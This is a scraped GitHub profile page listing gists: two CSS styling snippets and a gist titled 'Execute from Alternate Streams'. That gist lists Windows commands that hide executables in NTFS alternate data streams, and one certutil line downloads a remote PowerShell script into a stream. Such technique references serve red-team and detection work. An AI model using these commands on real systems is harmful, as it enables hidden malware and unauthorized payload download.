Skip to content

Instantly share code, notes, and snippets.

View MikronT's full-sized avatar
📖
Studying

MikronT MikronT

📖
Studying
View GitHub Profile
@PipeItToDevNull
PipeItToDevNull / boxed-tags.css
Last active October 13, 2024 00:19
PLN-Snippets
.cm-tag-active,
a.tag[href^="#active"] {
--tag-color: var(--color-orange);
--tag-border-color: var(--color-orange);
--tag-border-color-hover: var(--color-orange);
}
.cm-tag-inactive,
a.tag[href^="#inactive"] {
--tag-color: var(--color-red);
@JoeyBurzynski
JoeyBurzynski / 55-bytes-of-css.md
Last active April 8, 2025 14:18
58 bytes of css to look great nearly everywhere

58 bytes of CSS to look great nearly everywhere

When making this website, i wanted a simple, reasonable way to make it look good on most displays. Not counting any minimization techniques, the following 58 bytes worked well for me:

main {
  max-width: 38rem;
  padding: 2rem;
  margin: auto;
}
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active April 23, 2025 13:02
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab